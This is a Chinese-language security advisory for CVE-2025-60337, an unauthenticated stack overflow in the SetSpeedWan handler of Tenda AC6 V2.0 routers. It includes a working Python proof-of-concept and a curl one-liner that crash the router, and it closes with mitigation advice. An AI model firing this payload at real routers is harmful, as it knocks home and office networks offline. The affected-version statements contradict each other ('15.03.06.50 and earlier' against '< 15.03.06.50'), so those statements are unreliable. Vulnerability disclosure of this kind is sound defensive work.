CVE-2025-60337 Tenda AC6 V2.0 缓冲区溢出漏洞导致拒绝服务

漏洞信息

漏洞编号

CVE-2025-60337

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC6 V2.0

漏洞概述

CVE-2025-60337是Tenda AC6 V2.0路由器固件15.03.06.50版本中存在的一个高危缓冲区溢出漏洞。该漏洞位于SetSpeedWan函数的speed_dir参数处理逻辑中，攻击者可以通过构造恶意的speed_dir参数值触发缓冲区溢出条件。此漏洞无需认证即可被利用，攻击者可通过网络远程发送精心设计的请求包来触发该漏洞。成功利用此漏洞可导致路由器服务中断，造成拒绝服务（DoS）状态，影响网络的正常通信功能。由于该路由器通常部署在家庭和小型办公网络中，此类漏洞可能被恶意利用来瘫痪整个网络环境，给用户带来严重的安全风险和业务中断问题。攻击者无需获取任何认证凭据即可发起攻击，大大降低了攻击门槛，提高了漏洞的利用风险。

技术细节

该漏洞为典型的栈缓冲区溢出漏洞。在Tenda AC6 V2.0路由器的Web管理界面中，SetSpeedWan函数负责处理WAN口速度设置参数。函数在处理speed_dir参数时，未对输入数据进行充分的边界检查，直接将用户输入的数据复制到固定大小的栈缓冲区中。当攻击者向该参数注入超长字符串时，超出缓冲区容量的数据会覆盖相邻的栈内存区域，包括函数返回地址和保存的寄存器值。攻击者可通过精确构造溢出数据来控制程序执行流程，虽然当前描述主要涉及DoS攻击，但该类型的缓冲区溢出在特定条件下可能进一步被利用于代码执行。由于该函数通过HTTP协议处理请求，且无认证机制验证，任何能够访问路由器Web界面的攻击者都可以发送恶意请求触发漏洞。固件版本15.03.06.50及之前版本均受影响。

攻击链分析

STEP 1

步骤1

攻击者识别目标Tenda AC6 V2.0路由器，获取其IP地址

STEP 2

步骤2

攻击者构造包含超长字符串的speed_dir参数作为恶意payload

STEP 3

步骤3

攻击者通过HTTP POST请求向/goform/SetSpeedWan端点发送恶意数据

STEP 4

步骤4

SetSpeedWan函数接收到恶意speed_dir参数，未进行边界检查直接复制到栈缓冲区

STEP 5

步骤5

超长数据导致缓冲区溢出，覆盖栈上的返回地址和关键寄存器

STEP 6

步骤6

程序控制流被破坏，导致路由器服务崩溃或重启

STEP 7

步骤7

路由器进入拒绝服务状态，无法正常处理网络请求

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-60337 PoC - Tenda AC6 V2.0 SetSpeedWan Buffer Overflow
# Target: Tenda AC6 V2.0 Router
# Vulnerability: Buffer overflow in speed_dir parameter of SetSpeedWan function
# Impact: Denial of Service

target_ip = "192.168.0.1"  # Default Tenda router IP
target_port = 80
target_url = f"http://{target_ip}/goform/SetSpeedWan"

# Construct malicious payload with oversized speed_dir parameter
# The buffer overflow occurs when input exceeds the buffer size
payload = {
    "speed_dir": "A" * 1000,  # Overflow payload - may need adjustment based on buffer size
    "operation": "save"
}

try:
    print(f"[*] Sending exploit payload to {target_url}")
    print(f"[*] Payload length: {len(payload['speed_dir'])}")
    
    response = requests.post(target_url, data=payload, timeout=10)
    
    print(f"[*] Response Status: {response.status_code}")
    print(f"[*] Response: {response.text}")
    
    # Check if router is still responsive
    check_url = f"http://{target_ip}/"
    try:
        check_response = requests.get(check_url, timeout=5)
        print("[*] Router is still responsive")
    except:
        print("[!] Router appears to be down - DoS successful")
        
except requests.exceptions.RequestException as e:
    print(f"[!] Request failed: {e}")

# Alternative PoC with curl command:
# curl -X POST http://192.168.0.1/goform/SetSpeedWan -d "speed_dir=$(python3 -c 'print("A"*1000)')"

影响范围

Tenda AC6 V2.0 < 15.03.06.50

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）将路由器管理界面访问限制在局域网内，禁止公网访问；2）使用强密码保护路由器管理账户；3）启用路由器的入侵检测功能；4）监控网络流量，及时发现异常请求；5）考虑使用VPN等安全通道远程管理路由器；6）如果暂时不需要SetSpeedWan功能，可在防火墙中限制对该接口的访问。